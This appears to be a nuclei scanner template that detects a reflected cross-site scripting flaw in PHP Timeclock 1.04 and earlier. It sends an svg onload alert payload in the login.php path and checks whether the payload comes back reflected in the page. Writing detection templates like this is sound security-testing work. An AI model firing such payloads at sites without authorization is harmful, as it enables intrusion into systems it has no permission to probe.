nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml

39 lines
983 B
YAML

id: php-timeclock-xss
info:
name: PHP Timeclock <=1.04 - Cross-Site Scripting
author: pikpikcu
severity: high
description: PHP Timeclock 1.04 and prior contains multiple cross-site scripting vulnerabilities via login.php, timeclock.php, reports/audit.php. and reports/timerpt.php
reference:
- https://www.exploit-db.com/exploits/49853
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: xss,php,timeclock,edb
requests:
- method: GET
path:
- "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert`{{randstr}}`>"
- "PHP Timeclock Admin Login"
part: body
condition: and
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/09/23